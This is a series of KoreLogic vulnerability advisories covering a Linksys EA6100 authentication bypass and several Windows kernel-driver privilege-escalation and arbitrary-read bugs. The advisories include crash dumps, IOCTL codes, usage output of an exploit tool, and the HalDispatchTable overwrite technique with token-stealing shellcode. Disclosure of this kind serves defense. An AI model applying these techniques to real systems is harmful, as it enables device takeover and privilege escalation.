-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 KL-001-2015-006 : Linksys EA6100 Wireless Router Authentication Bypass Title: Linksys EA6100 Wireless Router Authentication Bypass Advisory ID: KL-001-2015-006 Publication Date: 2015.12.04 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2015-006.txt 1. Vulnerability Details Affected Vendor: Linksys Affected Product: EA6100 - EA6300 Wireless Router Affected Version: 1.1.5 Platform: Embedded Linux CWE Classification: CWE-288: Authentication Bypass Using an Alternate Path or Channel Impact: Remote Administration Attack vector: HTTP CVE-ID: 2. Vulnerability Description Multiple CGI scripts in the web-based administrative interface of the Linksys EA6100 - EA6300 Wireless Router allow unauthenticated access to the high-level administrative functions of the device. This vulnerability can be leveraged by an unauthenticated attacker to obtain the router's administrative password and subsequently arbitrarily configure the device. 3. Technical Description root@wpad:/tmp/_FW_EA6100_1.1.5.162431_prod.img.extracted/test# ls bin dev etc home JNAP lib libexec linuxrc mnt opt proc root sbin sys tmp usr var www root@wpad:/tmp/_FW_EA6100_1.1.5.162431_prod.img.extracted/test# cd www root@wpad:/tmp/_FW_EA6100_1.1.5.162431_prod.img.extracted/test/www# ls bootloader_info.cgi dhcp_log.txtget_counter_info.cgi incoming_log.txt JNAP outgoing_log.txt security_log.txt sysinfo.cgi usbinfo.cgi cgi-bin ezwifi_cfg.cgi getstinfo.cgi jcgi license.pdf qos_info.cgi speedtest_info.cgi ui root@wpad:/tmp/_FW_EA6100_1.1.5.162431_prod.img.extracted/test/www# ls -la sysinfo.cgi lrwxrwxrwx 1 root root 23 Jul 21 2014 sysinfo.cgi -> /www/ui/cgi/sysinfo.cgi root@wpad:/tmp/_FW_EA6100_1.1.5.162431_prod.img.extracted/test/www# cat ui/cgi/sysinfo.cgi #!/bin/sh # sysinfo.sh > /www/sysinfo.cgi # # When adding new debug information into this script file # do the following: #1) create your debug script #2) call your debug script in this sysinfo.sh script #using the format: # if [ -f ]; then # ./ # fi ... ... Other CGI files that are accessible from an unauthenticated perspective can be used to configure settings for the affected device. This led to the development of an exploit to abuse these vulnerabilities. level:Debug level$ ./linksys-ea6100-auth-bypass -h Usage: ./linksys-ea6100-auth-bypass [params] -h Help Menu -i Target Address -r Reset Attack -g Get System Info -p Get Wifi Password Example: ./linksys-ea6100-auth-bypass -i 10.10.10.1 -r Brought to you by Level at KoreLogic level:Debug level$ ./linksys-ea6100-auth-bypass -i 172.17.100.200 -p Getting wireless passphrase SSID=840146d6919 Passphrase=e0fc253e585bf33d7b level:Debug level$ ./linksys-ea6100-auth-bypass -i 172.17.100.200 -g|more Brought to you by Level at KoreLogic Getting system info page generated on Tue Jan 20 20:01:48 UTC 2015 UpTime: 20:01:48 up 3 days, 16:24, load average: 0.00, 0.04, 0.05 Firmware Version: 1.1.5.159694 Firmware Builddate: 2014-03-21 03:09 Product.type: production Linux: Linux version 2.6.36 (root@build-vm) (gcc version 4.2.3) #1 Thu Mar 20 19:40:45 PDT 2014 Board: focus ... ... 4. Mitigation and Remediation Recommendation No response from vendor; no remediation available. 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. 6. Disclosure Timeline 2015.09.10 - KoreLogic submits vulnerability details to secur...@linksys.com. 2015.10.05 - KoreLogic submits vulnerability details to secur...@linksys.com again. 2015.11.20 - KoreLogic requests CVE from MITRE. 2015.12.02 - KoreLogic requests CVE from MITRE. 2015.12.03 - KoreLogic requests CVE from MITRE. 2015.12.04 - KoreLogic requests CVE from MITRE. 2015.12.04 - Public disclosure. 7. Proof of Concept #!/usr/bin/env python3 # # Copyright 2015 KoreLogic Inc., All Rights Reserved. # # This proof of concept, having been partly or wholly developed # and/or sponsored by KoreLogic, Inc., is hereby released under # the terms and conditions set forth in the Creative Commons # Attribution Share-Alike 4.0 (United States) License: # # http://creativecommons.org/licenses/by-sa/4.0/ #
KL-001-2015-005 : VBox Satellite Express Arbitrary Write Privilege Escalation
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 KL-001-2015-005 : VBox Satellite Express Arbitrary Write Privilege Escalation Title: VBox Satellite Express Arbitrary Write Privilege Escalation Advisory ID: KL-001-2015-005 Publication Date: 2015.09.16 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2015-005.txt 1. Vulnerability Details Affected Vendor: VBox Communications Affected Product: Satellite Express Protocol Affected Version: 2.3.17.3 Platform: Microsoft Windows XP SP3, Microsoft Windows 7 (x86) CWE Classification: CWE-123: Write-what-where condition Impact: Arbitrary Code Execution Attack vector: IOCTL CVE-ID: CVE-2015-6923 2. Vulnerability Description A vulnerability within the ndvbs module allows an attacker to inject memory they control into an arbitrary location they define. This vulnerability can be used to overwrite function pointers in HalDispatchTable resulting in an elevation of privilege. 3. Technical Description Example against Windows XP: Windows XP Kernel Version 2600 (Service Pack 3) UP Free x86 compatible Product: WinNt, suite: TerminalServer SingleUserTS Built by: 2600.xpsp_sp3_qfe.101209-1646 Machine Name: Kernel base = 0x804d7000 PsLoadedModuleList = 0x805540c0 Debug session time: Tue Mar 10 18:57:54.259 2015 (UTC - 7:00) System Uptime: 0 days 0:11:19.843 * * * *Bugcheck Analysis * * * * Use !analyze -v to get detailed debugging information. BugCheck 50, {b41c5d4c, 0, 805068e1, 0} Probably caused by : ndvbs.sys ( ndvbs+94f ) Followup: MachineOwner - kd> kn Call stack: # ChildEBP RetAddr 00 f64fda98 8051cc7f nt!KeBugCheckEx+0x1b 01 f64fdaf8 805405d4 nt!MmAccessFault+0x8e7 02 f64fdaf8 805068e1 nt!KiTrap0E+0xcc 03 f64fdbb0 80506aae nt!MmMapLockedPagesSpecifyCache+0x211 04 f64fdbd0 f650e94f nt!MmMapLockedPages+0x18 05 f64fdc34 804ee129 ndvbs+0x94f 06 f64fdc44 80574e56 nt!IopfCallDriver+0x31 07 f64fdc58 80575d11 nt!IopSynchronousServiceTail+0x70 08 f64fdd00 8056e57c nt!IopXxxControlFile+0x5e7 09 f64fdd34 8053d6d8 nt!NtDeviceIoControlFile+0x2a 0a f64fdd34 7c90e514 nt!KiFastCallEntry+0xf8 0b 0021f3e4 7c90d28a ntdll!KiFastSystemCallRet 0c 0021f3e8 1d1add7a ntdll!ZwDeviceIoControlFile+0xc 0d 0021f41c 1d1aca96 _ctypes!DllCanUnloadNow+0x5b4a 0e 0021f44c 1d1a8db8 _ctypes!DllCanUnloadNow+0x4866 0f 0021f4fc 1d1a959e _ctypes!DllCanUnloadNow+0xb88 10 0021f668 1d1a54d8 _ctypes!DllCanUnloadNow+0x136e 11 0021f6c0 1e07bd9c _ctypes+0x54d8 12 python27!PyObject_Call+0x4c Example against Windows 7: Microsoft (R) Windows Debugger Version 6.3.9600.17298 X86 Copyright (c) Microsoft Corporation. All rights reserved. Windows 7 Kernel Version 7601 (Service Pack 1) UP Free x86 compatible Product: WinNt, suite: TerminalServer SingleUserTS Personal Built by: 7601.17514.x86fre.win7sp1_rtm.101119-1850 Kernel base = 0x8280c000 PsLoadedModuleList = 0x82956850 Debug session time: Tue Sep 15 15:08:38.938 2015 (UTC - 7:00) System Uptime: 0 days 0:27:26.358 kd> .symfix;.reload Loading Kernel Symbols ... Loading User Symbols Loading unloaded module list kd> !analyze -v ** ** *Bugcheck Analysis * ** ** KERNEL_MODE_EXCEPTION_NOT_HANDLED_M (108e) This is a very common bugcheck. Usually the exception address pinpoints the driver/function that caused the problem. Always note this address as well as the link date of the driver/image that contains this address. Some common problems are exception code 0x8003. This means a hard coded breakpoint or assertion was hit, but this system was booted /NODEBUG. This is not supposed to happen as developers should never have hardcoded breakpoints in retail code, but ... If this happens, make sure a debugger gets connected, and the system is booted /DEBUG. This will let us see why this breakpoint is
KL-001-2015-003 : SiS Windows VGA Display Manager Multiple Privilege Escalation
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 KL-001-2015-003 : SiS Windows VGA Display Manager Multiple Privilege Escalation Title: SiS Windows VGA Display Manager Multiple Privilege Escalation Advisory ID: KL-001-2015-003 Publication Date: 2015.09.01 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2015-003.txt 1. Vulnerability Details Affected Vendor: Silicon Integrated Systems Corporation Affected Product: Windows VGA Display Manager Affected Version: 6.14.10.3930 Platform: Microsoft Windows 7 (x86), Microsoft Windows XP SP3 CWE Classification: CWE-123: Write-what-where condition Impact: Arbitrary Code Execution Attack vector: IOCTL CVE-ID: CVE-2015-5465 2. Vulnerability Description Vulnerabilities within the srvkp module allows an attacker to inject memory they control into an arbitrary location they define or cause memory corruption. IOCTL request codes 0x96002400 and 0x96002404 have been demonstrated to trigger these vulnerabilities. These vulnerabilities can be used to obtain control of code flow in a privileged process and ultimately be used to escalate the privilege of an attacker. 3. Technical Description Example against Windows XP: Windows XP Kernel Version 2600 (Service Pack 3) UP Free x86 compatible Product: WinNt, suite: TerminalServer SingleUserTS Built by: 2600.xpsp_sp3_qfe.101209-1646 Machine Name: Kernel base = 0x804d7000 PsLoadedModuleList = 0x805540c0 *** * * *Bugcheck Analysis * * * *** Use !analyze -v to get detailed debugging information. BugCheck 50, {, 1, 804f3b76, 0} Probably caused by : srvkp.sys ( srvkp+3329 ) Followup: MachineOwner - kd> kn Call stack: # ChildEBP RetAddr 00 f6a529a0 8051cc7f nt!KeBugCheckEx+0x1b 01 f6a52a00 805405d4 nt!MmAccessFault+0x8e7 02 f6a52a00 804f3b76 nt!KiTrap0E+0xcc 03 f6a52ad0 804fdaf1 nt!IopCompleteRequest+0x92 04 f6a52b20 806d3c35 nt!KiDeliverApc+0xb3 05 f6a52b20 806d3861 hal!HalpApcInterrupt+0xc5 06 f6a52ba8 804fab03 hal!KeReleaseInStackQueuedSpinLock+0x11 07 f6a52bc8 804f07e4 nt!KeInsertQueueApc+0x4b 08 f6a52bfc f7910329 nt!IopfCompleteRequest+0x1d8 09 f6a52c34 804ee129 srvkp+0x3329 0a f6a52c44 80574e56 nt!IopfCallDriver+0x31 0b f6a52c58 80575d11 nt!IopSynchronousServiceTail+0x70 0c f6a52d00 8056e57c nt!IopXxxControlFile+0x5e7 0d f6a52d34 8053d6d8 nt!NtDeviceIoControlFile+0x2a 0e f6a52d34 7c90e514 nt!KiFastCallEntry+0xf8 0f 0021f3e4 7c90d28a ntdll!KiFastSystemCallRet 10 0021f3e8 1d1add7a ntdll!ZwDeviceIoControlFile+0xc 11 0021f41c 1d1aca96 _ctypes!DllCanUnloadNow+0x5b4a 12 0021f44c 1d1a8db8 _ctypes!DllCanUnloadNow+0x4866 13 0021f4fc 1d1a959e _ctypes!DllCanUnloadNow+0xb88 14 0021f668 1d1a54d8 _ctypes!DllCanUnloadNow+0x136e 15 0021f6c0 1e07bd9c _ctypes+0x54d8 16 python27!PyObject_Call+0x4c Example against Windows 7: Microsoft (R) Windows Debugger Version 6.2.9200.20512 X86 Copyright (c) Microsoft Corporation. All rights reserved. Loading Dump File [C:\Windows\MEMORY.DMP] Kernel Summary Dump File: Only kernel address space is available Symbol search path is: *** Invalid *** * Symbol loading may be unreliable without a symbol search path. * * Use .symfix to have the debugger choose a symbol path. * * After setting your symbol path, use .reload to refresh symbol locations. * Executable search path is: *** ** * Symbols can not be loaded because symbol path is not initialized. * * * * The Symbol Path can be set by: * * using the _NT_SYMBOL_PATH environment variable. * * using the -y argument when starting the debugger. * * using .sympath and .sympath+ * *** ** *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntkrpamp.exe - Windows 7 Kernel Version 7601 (Service Pack 1) UP Free x86 compatib le Product: WinNt, suite: TerminalServer SingleUserTS Built by: 7601.17514.x86fre.win7sp1_rtm.101119-1850 Machine Name: Kernel base = 0x82a12000 PsLoadedModuleList = 0x82b5c850 Debug session time: Mon Aug 17 14:36:36.286 2015 (UTC - 7:00) System Uptime: 0 days 11:46:55.313 ***
KL-001-2015-001 : Windows 2003 tcpip.sys Privilege Escalation
KL-001-2015-001 : Microsoft Windows Server 2003 SP2 Arbitrary Write Privilege Escalation Title: Microsoft Windows Server 2003 SP2 Arbitrary Write Privilege Escalation Advisory ID: KL-001-2015-001 Publication Date: 2015.01.28 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2015-001.txt 1. Vulnerability Details Affected Vendor: Microsoft Affected Product: TCP/IP Protocol Driver Affected Version: 5.2.3790.4573 Platform: Microsoft Windows Server 2003 Service Pack 2 Architecture: x86, x64, Itanium Impact: Privilege Escalation Attack vector: IOCTL CVE-ID: CVE-2014-4076 2. Vulnerability Description The tcpip.sys driver fails to sufficiently validate memory objects used during the processing of a user-provided IOCTL. 3. Technical Description By crafting an input buffer that will be passed to the Tcp device through the NtDeviceIoControlFile() function, it is possible to trigger a vulnerability that would allow an attacker to elevate privileges. This vulnerability was discovered while fuzzing the tcpip.sys driver. A collection of IOCTLs that could be targeted was obtained and subsequently fuzzed. During this process, one of the crashes obtained originated from the IOCTL 0x00120028. This was performed on an x86 installation of Windows Server 2003, Service Pack 2. ErrCode = eax= ebx=859ef888 ecx=0008 edx=0100 esi= edi=80a58270 eip=f67ebbbd esp=f620a9c8 ebp=f620a9dc iopl=0 nv up ei pl zr na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs= efl=00010246 tcpip!SetAddrOptions+0x1d: f67ebbbd 8b5e28 mov ebx,dword ptr [esi+28h] ds:0023:0028= A second chance exception has occurred during a mov instruction. This instruction is attempting to copy a pointer value from an un-allocated address space. Since no pointer can be found, an exception is generated. Let's begin by reviewing the call stack: kd kv *** Stack trace for last set context - .thread/.cxr resets it ChildEBP RetAddr Args to Child f620a9dc f67e416b f620aa34 0022 0004 tcpip!SetAddrOptions+0x1d (FPO: [Non-Fpo]) f620aa10 f67e40de f620aa34 859ef888 859ef8a0 tcpip!TdiSetInformationEx+0x539 (FPO: [Non-Fpo]) f620aa44 f67e3b24 85a733d0 85a73440 85a73440 tcpip!TCPSetInformationEx+0x8c (FPO: [Non-Fpo]) f620aa60 f67e3b51 85a733d0 85a73440 85a733d0 tcpip!TCPDispatchDeviceControl+0x149 (FPO: [Non-Fpo]) f620aa98 8081d7d3 85c4b410 85a733d0 85e82390 tcpip!TCPDispatch+0xf9 (FPO: [Non-Fpo]) f620aaac 808ef85d 85a73440 85e82390 85a733d0 nt!IofCallDriver+0x45 (FPO: [Non-Fpo]) f620aac0 808f05ff 85c4b410 85a733d0 85e82390 nt!IopSynchronousServiceTail+0x10b (FPO: [Non-Fpo]) f620ab5c 808e912e 06f4 nt!IopXxxControlFile+0x5e5 (FPO: [Non-Fpo]) f620ab90 f55c10fa 06f4 nt!NtDeviceIoControlFile+0x2a (FPO: [Non-Fpo]) The nt!NtDeviceIoControlFile() function was called, creating a chain of subsequent function calls that eventually led to the tcpip!SetAddrOptions() function being called. By de-constructing the call to nt!NtDeviceIoControlFile() we can derive all required information to re-create this exception. 0a b940dd34 80885614 nt!NtDeviceIoControlFile+0x2a eax= ebx=8c785070 ecx= edx= esi= edi= eip=808e912e esp=b940dd08 ebp=b940dd34 iopl=0 nv up ei pl zr na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs= efl=00010246 nt!NtDeviceIoControlFile+0x2a: 808e912e 5d pop ebp kd db [ebp+2C] L?0x4 b940dd60 00 00 00 00 kd db [ebp+28] L?0x4 b940dd5c 00 00 00 00 kd db [ebp+24] L?0x4 b940dd58 20 00 00 00 ... kd db [ebp+20] L?0x4 b940dd54 00 11 00 00 kd db [ebp+1c] L?0x4 b940dd50 28 00 12 00 (... kd db [ebp+18] L?0x4 b940dd4c 58 4f bd 00 XO.. kd db [ebp+14] L?0x4 b940dd48 00 00 00 00 kd db [ebp+10] L?0x4 b940dd44 00 00 00 00 kd db [ebp+0c] L?0x4 b940dd40 00 00 00 00 kd db [ebp+8] L?0x4 b940dd3c b8 06 00 00 The inputBuffer for this call references memory at 0x1000 with a length of 0x20. kd db 0x1100 L?0x20 1100 00 04 00 00 00 00 00 00-00 02 00 00 00 02 00 00 1110 22 00 00 00 04 00 00 00-00 00 01
KL-001-2014-004 : VMWare vmx86.sys Arbitrary Kernel Read
Title: VMWare vmx86.sys Arbitrary Kernel Read Advisory ID: KL-001-2014-004 Publication Date: 2014.11.04 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-004.txt 1. Vulnerability Details Affected Vendor: VMWare Affected Product: Workstation Affected Version: 10.0.0.40273 Platform: Microsoft Windows XP SP3 x86, Microsoft Windows Server 2003 SP2 x86, Microsoft Windows 7 SP1 x86 CWE Classification: CWE-20: Improper Input Validation Impact: Arbitrary Read, Denial-of-Service Attack vector: IOCTL 2. Vulnerability Description A vulnerability within the vmx86 driver allows an attacker to specify a memory address within the kernel and have the memory stored at that address be returned to the attacker. 3. Technical Description The first four bytes of the InputBuffer parameter passed to DeviceIoControl is used as the source parameter in a memcpy call. The InputBuffer must be a minimum of eight bytes long in order to trigger the vulnerability. The OutputBuffer parameter passed to DeviceIoControl is used as the destination address for the output from the DeviceIoControl call. In this case, the data returned is the same data residing at the source paramter of memcpy. This can therefore be abused in a way that allows an attacker to arbitrarily define a kernel address, and have the memory stored at that address be returned to the attacker at an address residing in userland. Probably caused by : vmx86.sys ( vmx86+bd6 ) Followup: MachineOwner - kd .symfix;.reload;!analyze -v Loading Kernel Symbols ... ... Loading User Symbols . Loading unloaded module list . *** * * *Bugcheck Analysis* * * *** PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was referenced. This cannot be protected by try-except, it must be protected by a Probe. Typically the address is just plain bad or it is pointing at freed memory. Arguments: Arg1: , memory referenced. Arg2: , value 0 = read operation, 1 = write operation. Arg3: 82c727f3, If non-zero, the instruction address which referenced the bad memory address. Arg4: , (reserved) Debugging Details: -- READ_ADDRESS: FAULTING_IP: nt!memcpy+33 82c727f3 f3a5rep movs dword ptr es:[edi],dword ptr [esi] MM_INTERNAL_CODE: 0 DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT BUGCHECK_STR: 0x50 PROCESS_NAME: python.exe CURRENT_IRQL: 0 ANALYSIS_VERSION: 6.3.9600.16384 (debuggers(dbg).130821-1623) x86fre TRAP_FRAME: 822e47dc -- (.trap 0x822e47dc) ErrCode = eax=2000 ebx=87433558 ecx=0800 edx= esi= edi=856a9000 eip=82c727f3 esp=822e4850 ebp=822e4858 iopl=0 nv up ei pl nz ac po nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs= efl=00010212 nt!memcpy+0x33: 82c727f3 f3a5rep movs dword ptr es:[edi],dword ptr [esi] Resetting default scope LAST_CONTROL_TRANSFER: from 82c7a3d8 to 82cc741b STACK_TEXT: 822e47c4 82c7a3d8 nt!MmAccessFault+0x106 822e47c4 82c727f3 nt!KiTrap0E+0xdc 822e4858 93572bd6 856a9000 2000 nt!memcpy+0x33 822e48cc 9357329a 856a9000 0008 856a9000 vmx86+0xbd6 822e48f8 82c70593 86f0d030 87433540 87433540 vmx86+0x129a 822e4910 82e6499f 871f8b08 87433540 874335b0 nt!IofCallDriver+0x63 822e4930 82e67b71 86f0d030 871f8b08 nt!IopSynchronousServiceTail+0x1f8 822e49cc 82eae3f4 86f0d030 87433540 nt!IopXxxControlFile+0x6aa 822e4a00 821210fa 007c nt!NtDeviceIoControlFile+0x2a 822e4b14 82cb7685 nt!KiDeliverApc+0x17f 822e4b58 82cb64f7 85689a10 8000 nt!KiSwapThread+0x24e 822e4b80 82cb61d5 85689a10 85689ad0 008a nt!KiCommitThreadWait+0x1df 822e4bd8 82e639fd 01b1fd01 0001 822e4bc8 nt!KeDelayExecutionThread+0x2aa 822e4c24 82c771ea 0001 01b1ff54 01b1ff78 nt!NtDelayExecution+0x8d 822e4c24 777c70b4 0001 01b1ff54 01b1ff78 nt!KiFastCallEntry+0x12a 01b1ff0c 777c57d4 75a31876 0001 01b1ff54 ntdll!KiFastSystemCallRet 01b1ff10 75a31876 0001 01b1ff54 da57de5e ntdll!NtDelayExecution+0xc 01b1ff78 00401ed6 0001 01b1ff94 KERNELBASE!SleepEx+0x65 01b1ff94 777e37f5 762fe46a kernel32!BaseThreadInitThunk+0xe 01b1ffd4 777e37c8 00401ec0 ntdll!__RtlUserThreadStart+0x70
KL-001-2014-002 : Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation
Title: Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation Advisory ID: KL-001-2014-002 Publication Date: 2014-07-18 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt 1. Vulnerability Details Affected Vendor: Microsoft Affected Product: Bluetooth Personal Area Networking Affected Versions: 5.1.2600.5512 Platform: Microsoft Windows XP SP3 CWE Classification: CWE-123: Write-what-where Condition Impact: Privilege Escalation Attack vector: IOCTL CVE ID: CVE-2014-4971 2. Vulnerability Description A vulnerability within the BthPan module allows an attacker to inject memory they control into an arbitrary location they define. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile. 3. Technical Description A userland process can create a handle into the BthPan device and subsequently make DeviceIoControlFile() calls into that device. During the IRP handler routine for 0x0012b814 the user provided OutputBuffer address is not validated. This allows an attacker to specify an arbitrary address and write (or overwrite) the memory residing at the specified address. This is classicaly known as a write-what-where vulnerability and has well known exploitation methods associated with it. A stack trace from our fuzzing can be seen below. In our fuzzing testcase, the specified OutputBuffer in the DeviceIoControlFile() call is 0x. STACK_TEXT: b1e065b8 8051cc7f 0050 0001 nt!KeBugCheckEx+0x1b b1e06618 805405d4 0001 nt!MmAccessFault+0x8e7 b1e06618 804f3b76 0001 nt!KiTrap0E+0xcc b1e066e8 804fdaf1 8216cc80 b1e06734 b1e06728 nt!IopCompleteRequest+0x92 b1e06738 80541890 nt!KiDeliverApc+0xb3 b1e06758 804fb4a7 8055b1c0 81bdeda8 b1e0677c nt!KiUnlockDispatcherDatabase+0xa8 b1e06768 80534b09 8055b1c0 81f7a290 81f016b8 nt!KeInsertQueue+0x25 b1e0677c f83e26ec 81f7a290 b1e067a8 nt!ExQueueWorkItem+0x1b b1e0678c b272b5a1 81f7a288 81e002d8 NDIS!NdisScheduleWorkItem+0x21 b1e067a8 b273a544 b1e067c8 b273a30e 8216cc40 bthpan!BthpanReqAdd+0x16b b1e069e8 b273a62b 8216cc40 0258 81e6f550 bthpan!IoctlDispatchDeviceControl+0x1a8 b1e06a00 f83e94bb 81e6f550 8216cc40 81d74d68 bthpan!IoctlDispatchMajor+0x93 b1e06a18 f83e9949 81e6f550 8216cc40 8217e6e8 NDIS!ndisDummyIrpHandler+0x48 b1e06ab4 804ee129 81e6f550 8216cc40 806d32d0 NDIS!ndisDeviceControlIrpHandler+0x5c b1e06ac4 80574e56 8216ccb0 81d74d68 8216cc40 nt!IopfCallDriver+0x31 b1e06ad8 80575d11 81e6f550 8216cc40 81d74d68 nt!IopSynchronousServiceTail+0x70 b1e06b80 8056e57c 06a8 nt!IopXxxControlFile+0x5e7 b1e06bb4 b1a2506f 06a8 nt!NtDeviceIoControlFile+0x2a WARNING: Stack unwind information not available. Following frames may be wrong. Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v' command shows the fault originating in the bthpan driver. FOLLOWUP_IP: bthpan!BthpanReqAdd+16b b272b5a1 ebc2jmp bthpan!BthpanReqAdd+0x12f (b272b565) Reviewing the TRAP_FRAME at the time of crash we can see IopCompleteRequest() copying data from InputBuffer into the OutputBuffer. InputBuffer is another parameter provided to the DeviceIoControlFile() function and is therefore controllable by the attacker. The edi register contains the invalid address provided during the fuzz testcase. TRAP_FRAME: b1e06630 -- (.trap 0xb1e06630) ErrCode = 0002 eax=006a ebx=8216cc40 ecx=001a edx=0001 esi=81e002d8 edi= eip=804f3b76 esp=b1e066a4 ebp=b1e066e8 iopl=0 nv up ei pl nz na po cy cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs= efl=00010203 nt!IopCompleteRequest+0x92: 804f3b76 f3a5rep movs dword ptr es:[edi],dword ptr [esi] A write-what-where vulnerability can be leveraged to obtain escalated privileges. To do so, an attacker will need to allocate memory in userland that is populated with shellcode designed to find the Token for PID 4 (System) and then overwrite the token for its own process. By leveraging the vulnerability in BthPan it is then possible to overwrite the pointer at HalDispatchTable+0x4 with a pointer to our shellcode. Calling NtQueryIntervalProfile() will subsequently call HalDispatchTable+0x4, execute our shellcode, and elevate the privilege of the exploit process. 4. Mitigation and Remediation Recommendation None. A patch is not likely to be forthcoming from the vendor. 5. Credit This vulnerability was discovered by Matt Bergin of KoreLogic Security, Inc. 6. Disclosure Timeline 2014.04.28 - Initial contact; sent Microsoft report and PoC. 2014.04.28 - Microsoft acknowledges receipt of
KL-001-2014-003 : Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation
Title: Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation Advisory ID: KL-001-2014-003 Publication Date: 2014.07.18 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt 1. Vulnerability Details Affected Vendor: Microsoft Affected Product: MQ Access Control Affected Versions: 5.1.0.1110 Platform: Microsoft Windows XP SP3 CWE Classification: CWE-123: Write-what-where Condition Impact: Privilege Escalation Attack vector: IOCTL CVE ID: CVE-2014-4971 2. Vulnerability Description A vulnerability within the MQAC module allows an attacker to inject memory they control into an arbitrary location they define. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile. 3. Technical Description A userland process can create a handle into the MQAC device and subsequently make DeviceIoControlFile() calls into that device. During the IRP handler routine for 0x1965020f the user provided OutputBuffer address is not validated. This allows an attacker to specify an arbitrary address and write (or overwrite) the memory residing at the specified address. This is classically known as a write-what-where vulnerability and has well known exploitation methods associated with it. A stack trace from our fuzzing can be seen below. In our fuzzing testcase, the specified OutputBuffer in the DeviceIoControlFile() call is 0x. STACK_TEXT: b1c4594c 8051cc7f 0050 0001 nt!KeBugCheckEx+0x1b b1c459ac 805405d4 0001 nt!MmAccessFault+0x8e7 b1c459ac b230af37 0001 nt!KiTrap0E+0xcc b1c45a68 b230c0a1 00d3 000c mqac!AC2QM+0x5d b1c45ab4 804ee129 81ebb558 82377e48 806d32d0 mqac!ACDeviceControl+0x16d b1c45ac4 80574e56 82377eb8 82240510 82377e48 nt!IopfCallDriver+0x31 b1c45ad8 80575d11 81ebb558 82377e48 82240510 nt!IopSynchronousServiceTail+0x70 b1c45b80 8056e57c 06a4 nt!IopXxxControlFile+0x5e7 b1c45bb4 b1aea17e 06a4 nt!NtDeviceIoControlFile+0x2a Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v' command shows the fault originating in the mqac driver. OLLOWUP_IP: mqac!AC2QM+5d b230af37 891emov dword ptr [esi],ebx Reviewing the TRAP_FRAME at the time of crash we can see IopCompleteRequest() copying data from InputBuffer into the OutputBuffer. InputBuffer is another parameter provided to the DeviceIoControlFile() function and is therefore controllable by the attacker. The edi register contains the invalid address provided during the fuzz testcase. TRAP_FRAME: b1c459c4 -- (.trap 0xb1c459c4) ErrCode = 0002 eax=b1c45a58 ebx= ecx= edx=82377e48 esi= edi= eip=b230af37 esp=b1c45a38 ebp=b1c45a68 iopl=0 nv up ei pl zr na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs= efl=00010246 mqac!AC2QM+0x5d: b230af37 891emov dword ptr [esi],ebx ds:0023:= A write-what-where vulnerability can be leveraged to obtain escalated privileges. To do so, an attacker will need to allocate memory in userland that is populated with shellcode designed to find the Token for PID 4 (System) and then overwrite the token for its own process. By leveraging the vulnerability in MQAC it is then possible to overwrite the pointer at HalDispatchTable+0x4 with a pointer to our shellcode. Calling NtQueryIntervalProfile() will subsequently call HalDispatchTable+0x4, execute our shellcode, and elevate the privilege of the exploit process. 4. Mitigation and Remediation Recommendation None. A patch is not likely to be forthcoming from the vendor. 5. Credit This vulnerability was discovered by Matt Bergin of KoreLogic Security, Inc. 6. Disclosure Timeline 2014.04.28 - Initial contact; sent Microsoft report and PoC. 2014.04.28 - Microsoft acknowledges receipt of vulnerability report; states XP is no longer supported and asks if the vulnerability affects other versions of Windows. 2014.04.29 - KoreLogic asks Microsoft for clarification of their support policy for XP. 2014.04.29 - Microsoft says XP-only vulnerabilities will not be addressed with patches. 2014.04.29 - KoreLogic asks if Microsoft intends to address the vulnerability report. 2014.04.29 - Microsoft opens case to investigate the impact of the vulnerability on non-XP systems. 2014.05.06 - Microsoft asks again if this vulnerability affects non-XP systems. 2014.05.14 - KoreLogic informs Microsoft that the vulnerability report is for XP and other Windows versions have
KL-001-2014-001 : Oracle VirtualBox Guest Additions Arbitrary Write Privilege Escalation
Title: Oracle VirtualBox Guest Additions Arbitrary Write Privilege Escalation Advisory ID: KL-001-2014-001 Publication Date: 07.15.2014 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-001.txt 1. Vulnerability Details Affected Vendor: Oracle Affected Product: VirtualBox Guest Additions Affected Versions: 4.3.8 - 4.3.10 Platform: Microsoft XP SP3 CWE Classification: CWE-123: Write-what-where Condition Impact: Arbitrary code execution Attack vector: IOCTL CVE ID: CVE-2014-2477 2. Vulnerability Description A vulnerability within VBoxGuest module allows an attacker to inject memory they control into an arbitrary location they define. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile. 3. Technical Description A userland process can create a handle into the VBoxGuest device and subsequently make DeviceIoControlFile() calls into that device. During the IRP handler routine for 0x0022a040 the user provided OutputBuffer address is not validated. This allows an attacker to specify an arbitrary address and write (or overwrite) the memory residing at the specified address. This is classicaly known as a write-what-where vulnerability and has well known exploitation methods associated with it. A stack trace from our fuzzing can be seen below. In our fuzzing testcase, the specified OutputBuffer in the DeviceIoControlFile() call is 0x. STACK_TEXT: f824a9d4 805241e0 0050 